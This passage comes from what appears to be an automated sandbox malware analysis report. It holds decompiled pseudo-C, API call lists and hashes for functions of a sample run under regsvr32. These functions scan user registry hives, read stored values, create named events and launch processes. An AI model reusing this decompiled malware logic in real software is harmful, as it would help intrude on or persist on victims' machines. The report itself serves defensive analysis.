					_t62 = E001E7702(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E001E50CA(_a8);
						goto L29;
					}
					_t64 =  *0x1ea2cc; // 0x4e09c98
					_t16 = _t64 + 0xc; // 0x4e09d8c
					_t65 = E001E4AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d001e90, executed
						_t67 = E001E5F2A(_t97,  *_t33, _t91, _a8,  *0x1ea384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x1ea2d4; // 0x4c1d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x1eb9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x1eb9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E001E5927(_t69,  *0x1ea384,  *0x1ea388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x1ea2d4; // 0x4c1d5a8
									_t44 = _t71 + 0x1eb86a; // 0x74666f53
									_t73 = E001E4AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d001e90
										E001E1F7A( *_t47, _t91, _a8,  *0x1ea388, _a24);
										_t49 = _t101 + 0x10; // 0x3d001e90
										E001E1F7A( *_t49, _t91, _t99,  *0x1ea380, _a16);
										E001E50CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d001e90, executed
									E001E1F7A( *_t40, _t91, _a8,  *0x1ea388, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d001e90
									E001E1F7A( *_t43, _t91, _a8,  *0x1ea380, _a16);
								}
								if( *_t101 != 0) {
									E001E50CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d001e90, executed
					_t81 = E001E6A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d001e90
							E001E5F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E001E50CA(_t100);
						_t98 = _a16;
					}
					E001E50CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E001E77A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x1ea38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x001e1d57
0x001e1d60
0x001e1d67
0x001e1d6c
0x001e1dd9
0x001e1ddf
0x001e1de4
0x001e1deb
0x001e1df2
0x001e1df5
0x001e1f60
0x001e1f67
0x001e1f67
0x001e1f6c
0x001e1f6e
0x001e1f6e
0x001e1f77
0x001e1f77
0x001e1dfb
0x001e1e00
0x001e1e07
0x001e1f56
0x001e1f59
0x00000000
0x001e1f59
0x001e1e0d
0x001e1e12
0x001e1e15
0x001e1e1c
0x001e1e1f
0x001e1e68
0x001e1e68
0x001e1e7b
0x001e1e7e
0x001e1e85
0x001e1e8d
0x001e1e92
0x001e1e9c
0x001e1e9c
0x001e1e94
0x001e1e94
0x001e1e94
0x001e1e94
0x001e1ebe
0x001e1ec6
0x001e1ef4
0x001e1ef9
0x001e1f00
0x001e1f05
0x001e1f09
0x001e1f3b
0x001e1f0b
0x001e1f18
0x001e1f1b
0x001e1f2b
0x001e1f2e
0x001e1f34
0x001e1f34
0x001e1ec8
0x001e1ed5
0x001e1ed8
0x001e1eea
0x001e1eed
0x001e1eed
0x001e1f45
0x001e1f51
0x001e1f47
0x001e1f4a
0x001e1f4a
0x001e1f45
0x001e1ebe
0x00000000
0x001e1e85
0x001e1e2e
0x001e1e31
0x001e1e38
0x001e1e3e
0x001e1e41
0x001e1e43
0x001e1e4f
0x001e1e52
0x001e1e52
0x001e1e58
0x001e1e5d
0x001e1e5d
0x001e1e63
0x00000000
0x001e1e63
0x001e1d71
0x00000000
0x001e1d98
0x001e1d98
0x001e1da4
0x001e1db7
0x001e1dbd
0x001e1dc5
0x00000000
0x001e1dc5

APIs

StrChrA.SHLWAPI(001E30C2,0000005F,00000000,00000000,00000104), ref: 001E1D8A
lstrcpy.KERNEL32(?,?), ref: 001E1DB7

Part of subcall function 001E4AA6: lstrlen.KERNEL32(?,00000000,04E09C98,7742C740,001E13D0,04E09E9D,001E55DE,001E55DE,?,001E55DE,?,63699BC3,E8FA7DD7,00000000), ref: 001E4AAD
Part of subcall function 001E4AA6: mbstowcs.NTDLL ref: 001E4AD6
Part of subcall function 001E4AA6: memset.NTDLL ref: 001E4AE8

Part of subcall function 001E1F7A: lstrlenW.KERNEL32(?,?,?,001E1F20,3D001E90,80000002,001E30C2,001E4106,74666F53,4D4C4B48,001E4106,?,3D001E90,80000002,001E30C2,?), ref: 001E1F9F

Part of subcall function 001E50CA: RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

lstrcpy.KERNEL32(?,00000000), ref: 001E1DD9

Strings

(, xrefs: 001E1E3A
\, xrefs: 001E1DBD

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 564e9410fd9793f48fe6f0cc5109185b2adbb56a30aeb462eda0d9f5ff632ae7
Instruction ID: bf3c3475b0e230b0d84441b541bb951ba45ab8e2646501f49ab057565c5387d3
Opcode Fuzzy Hash: 564e9410fd9793f48fe6f0cc5109185b2adbb56a30aeb462eda0d9f5ff632ae7
Instruction Fuzzy Hash: 3C517C72500A8AFFCF229FA2DC81EAE7BBAFF14314F104414FA1597061D731E9559B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E6BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E001E6BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E001E2902(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x1ea2d4; // 0x4c1d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x1eb4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x1eb8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x1ea100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x001e6be1
0x001e6be8
0x001e6bec
0x001e6bf1
0x001e6bf8
0x001e6bfb
0x001e6c05
0x001e6c0a
0x001e6c16
0x001e6c1d
0x001e6c27
0x001e6c27
0x001e6c1f
0x001e6c1f
0x001e6c1f
0x001e6c1f
0x001e6c2d
0x001e6c30
0x001e6c38
0x001e6c3b
0x001e6c3e
0x001e6c41
0x001e6c46
0x001e6c4f
0x001e6c5c
0x001e6c51
0x001e6c57
0x001e6c57
0x001e6c62
0x001e6c62
0x001e6c6a

APIs

Part of subcall function 001E2902: SysAllocString.OLEAUT32(?), ref: 001E295E
Part of subcall function 001E2902: SysAllocString.OLEAUT32(0070006F), ref: 001E2972
Part of subcall function 001E2902: SysAllocString.OLEAUT32(00000000), ref: 001E2984
Part of subcall function 001E2902: SysFreeString.OLEAUT32(00000000), ref: 001E29E8

memset.NTDLL ref: 001E6C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 001E6C41
GetLastError.KERNEL32 ref: 001E6C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 001E6C62

Strings

<, xrefs: 001E6C16

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 6f5197e73d38d25301792064a04565b34ec93b0e69e5a481fc5f82c139aff1de
Instruction ID: eab1506bd883c911292428ae5af1f163a6553f39b101047ea925b41cbea0b11f
Opcode Fuzzy Hash: 6f5197e73d38d25301792064a04565b34ec93b0e69e5a481fc5f82c139aff1de
Instruction Fuzzy Hash: B6112A71900258ABDB00DFA6D889B9E7BFCEB18790F508016F909EB281D774A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 001E73C3, Relevance: 7.6, APIs: 5, Instructions: 92
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001E73C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x1ea2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x1ea2d4; // 0x4c1d5a8
				_t3 = _t8 + 0x1eb8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E001E2DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x1ea2f8, 1, 0, _t30);
					E001E50CA(_t30);
				}
				_t12 =  *0x1ea2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E001E513E(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E001E6BE1(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E001E51A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x001e73c4
0x001e73cb
0x001e73d5
0x001e73d9
0x001e73df
0x001e73ec
0x001e73f3
0x001e73f7
0x001e7409
0x001e740b
0x001e740b
0x001e7410
0x001e7417
0x001e7422
0x00000000
0x00000000
0x001e7424
0x001e742b
0x00000000
0x00000000
0x001e7438
0x001e743c
0x001e743e
0x001e7443
0x001e7443
0x001e744b
0x001e7450
0x001e7454
0x001e7458
0x00000000
0x00000000
0x001e7466
0x001e746a
0x00000000
0x00000000
0x001e746a
0x00000000
0x001e746c
0x001e746c
0x001e746c
0x001e7472
0x001e7474
0x001e7474
0x001e747e
0x001e7482
0x001e7494
0x001e7494
0x001e7498
0x001e749e
0x001e749e
0x001e74a1
0x001e74a3
0x001e74a6
0x001e74a6
0x001e74ad
0x001e74b3
0x001e74b3

APIs

Part of subcall function 001E2DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,04E09C98,7742C740,001E55DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,001E55DE), ref: 001E2E20
Part of subcall function 001E2DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 001E2E44
Part of subcall function 001E2DEA: lstrcat.KERNEL32(00000000,00000000), ref: 001E2E4C

CreateEventA.KERNEL32(001EA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,001E30E1,?,?,?), ref: 001E7402

Part of subcall function 001E50CA: RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

StrChrW.SHLWAPI(001E30E1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,001E30E1,?,?,?), ref: 001E7432
WaitForSingleObject.KERNEL32(00000000,00004E20,001E30E1,00000000,?,00000000,?,001E30E1,?,?,?,?,?,?,?,001E211B), ref: 001E7460
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,001E30E1,?,?,?), ref: 001E748E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,001E30E1,?,?,?), ref: 001E74A6

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 36514f8cb4ed0a57b55b0db25eb044f115c0c9b5c879bd3a102737e7986ad1ce
Instruction ID: e96de7cd6d90ab68cbcdfe29d6b5a0519ced9b0cfa66c91bbe77108fb8e6015a
Opcode Fuzzy Hash: 36514f8cb4ed0a57b55b0db25eb044f115c0c9b5c879bd3a102737e7986ad1ce
Instruction Fuzzy Hash: 06210532604BD26BE7216BEA9C84B5F7BEDAF54720F450624FE01AB2C1EB70DC408741

Uniqueness

Uniqueness Score: -1.00%

Function 001E4039, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E4039(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E001E6837(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E001E50CA(_v28);
							goto L17;
						}
						_t42 = E001E1D57(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E001E50CA(_v24);
						_v20 = _v16;
						_t47 = E001E6837(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x1ea2c4, 0) == 0x102);
				goto L16;
			}

0x001e4039
0x001e4053
0x001e4056
0x001e4059
0x001e405c
0x001e405f
0x001e4065
0x001e4069
0x001e4143
0x001e4147
0x001e4147
0x001e4072
0x001e4079
0x001e4080
0x001e4083
0x001e4138
0x001e413b
0x00000000
0x001e4141
0x001e4089
0x001e408c
0x001e4093
0x001e409d
0x001e40a6
0x001e40ac
0x001e40b4
0x001e40ec
0x001e4126
0x001e412c
0x001e412e
0x001e412e
0x001e4130
0x001e4133
0x00000000
0x001e4133
0x001e4101
0x001e4106
0x001e410a
0x00000000
0x00000000
0x00000000
0x001e410a
0x001e40b9
0x001e40c8
0x00000000
0x00000000
0x001e40cd
0x001e40d6
0x001e40d9
0x001e40e0
0x001e40e3
0x001e40be
0x001e40be
0x00000000
0x001e40be
0x001e40e7
0x00000000
0x001e40e7
0x001e40bb
0x00000000
0x001e410c
0x001e4119
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,001E30C2,?), ref: 001E405F

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

RegEnumKeyExA.KERNELBASE(?,?,?,001E30C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,001E30C2), ref: 001E40A6
WaitForSingleObject.KERNEL32(00000000,?,?,?,001E30C2,?,001E30C2,?,?,?,?,?,001E30C2,?), ref: 001E4113
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,001E30C2,?,?,?,?,?,001E211B,?), ref: 001E413B

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: a907a3f13edb2ff5cd0d4b2baa5baa71e779e81bc23a8b1ef527b9fe29b71ad5
Instruction ID: 25722e99ec45a642b92f29a6406109e41ee155fecadf07fa7e1a8ddafc7280d0
Opcode Fuzzy Hash: a907a3f13edb2ff5cd0d4b2baa5baa71e779e81bc23a8b1ef527b9fe29b71ad5
Instruction Fuzzy Hash: 02313871C00699ABCF21AFE6DC858EEFFB9EFA4350F11402AF651B2160D3701A80DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001E5C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 001E5C8C
SysAllocString.OLEAUT32(001E1E05), ref: 001E5CCF
SysFreeString.OLEAUT32(00000000), ref: 001E5CE3
SysFreeString.OLEAUT32(00000000), ref: 001E5CF1

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 32d11022c27a144f97f720e62a257efccec3cbaaf097a9b42898ba821e7eaeb1
Instruction ID: 4d67d34bf69163fb4c7b69e7a4d5ab32032975a59cb4378f95e03fc3fd9ca1d0
Opcode Fuzzy Hash: 32d11022c27a144f97f720e62a257efccec3cbaaf097a9b42898ba821e7eaeb1
Instruction Fuzzy Hash: DA313E71900689EFCB05CFD9D8D48AE7BB9FF48344B20842EF5059B210D7359985CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 001E3032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E001E3032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E001E6710(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E001E15B9(_t23);
						}
					}
					return _t38;
				}
				_t26 = E001E4C8C(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x1ea2f8, 1, 0,  *0x1ea394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E001E4039(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E001E1D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E001E3C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E001E73C3( &_v32, _t39);
					goto L13;
				}
			}

0x001e3032
0x001e303f
0x001e3045
0x001e3046
0x001e3047
0x001e3048
0x001e3049
0x001e304d
0x001e3054
0x001e3059
0x001e305d
0x001e30e5
0x001e30e5
0x001e30e8
0x001e30ea
0x001e30f2
0x001e30f8
0x001e30fb
0x001e30fb
0x001e30f8
0x001e3106
0x001e3106
0x001e3069
0x001e3070
0x001e3072
0x001e3072
0x001e3089
0x001e308d
0x001e3090
0x001e309b
0x001e30a2
0x001e30a2
0x001e30ae
0x001e30af
0x001e30bd
0x001e30b1
0x001e30b1
0x001e30b2
0x001e30b3
0x001e30b4
0x001e30b5
0x001e30b6
0x001e30b6
0x001e30c2
0x001e30c7
0x001e30c9
0x001e30cb
0x001e30cb
0x001e30d2
0x00000000
0x001e30d4
0x001e30d4
0x001e30e1
0x00000000
0x001e30e1

APIs

CreateEventA.KERNEL32(001EA2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,001E211B,?,00000001), ref: 001E3083
SetEvent.KERNEL32(00000000,?,?,?,?,001E211B,?,00000001,001E560C,00000002,?,?,001E560C), ref: 001E3090
Sleep.KERNELBASE(00000BB8,?,?,?,?,001E211B,?,00000001,001E560C,00000002,?,?,001E560C), ref: 001E309B
CloseHandle.KERNEL32(00000000,?,?,?,?,001E211B,?,00000001,001E560C,00000002,?,?,001E560C), ref: 001E30A2

Part of subcall function 001E4039: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,001E30C2,?), ref: 001E405F
Part of subcall function 001E4039: RegEnumKeyExA.KERNELBASE(?,?,?,001E30C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,001E30C2), ref: 001E40A6
Part of subcall function 001E4039: WaitForSingleObject.KERNEL32(00000000,?,?,?,001E30C2,?,001E30C2,?,?,?,?,?,001E30C2,?), ref: 001E4113
Part of subcall function 001E4039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,001E30C2,?,?,?,?,?,001E211B,?), ref: 001E413B

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: 90fc1e1e0b5bfdf70df384ff5e049995735bd7753d57d6b1a3cff0fbf14dad57
Instruction ID: 5f61531ee833701f59618138439b0697ee4e40c9a70c7ccb7cbfe3d24b4fda84
Opcode Fuzzy Hash: 90fc1e1e0b5bfdf70df384ff5e049995735bd7753d57d6b1a3cff0fbf14dad57
Instruction Fuzzy Hash: 8721C972E00694ABCF10AFE7C8899EEB7BDAF44350B454469FA21E7140DB31DE448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E6A36, Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E6A36(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E001E6837(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E001E50CA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E001E4323(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x001e6a42
0x001e6a65
0x001e6a6f
0x001e6a75
0x001e6a79
0x001e6a91
0x001e6a96
0x001e6ade
0x001e6a98
0x001e6aa0
0x001e6aa4
0x001e6adb
0x001e6aa6
0x001e6ab8
0x001e6abc
0x001e6ad2
0x001e6abe
0x001e6ac1
0x001e6ac3
0x001e6ac8
0x001e6acd
0x001e6acd
0x001e6ac8
0x001e6abc
0x001e6aa4
0x001e6ae6
0x001e6ae6
0x001e6aed
0x001e6af3
0x001e6af3
0x001e6a5b
0x001e6a5f
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,04E09D8C,04E09D8C), ref: 001E6A6F
RegQueryValueExW.KERNELBASE(04E09D8C,?,00000000,80000002,00000000,00000000,?,001E1E36,3D001E90,80000002,001E30C2,00000000,001E30C2,?,04E09D8C,80000002), ref: 001E6A91
RegQueryValueExW.ADVAPI32(04E09D8C,?,00000000,80000002,00000000,00000000,00000000,?,001E1E36,3D001E90,80000002,001E30C2,00000000,001E30C2,?,04E09D8C), ref: 001E6AB6
RegCloseKey.KERNELBASE(04E09D8C,?,001E1E36,3D001E90,80000002,001E30C2,00000000,001E30C2,?,04E09D8C,80000002,00000000,?), ref: 001E6AE6

Part of subcall function 001E4323: SafeArrayDestroy.OLEAUT32(00000000), ref: 001E43A8

Part of subcall function 001E50CA: RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

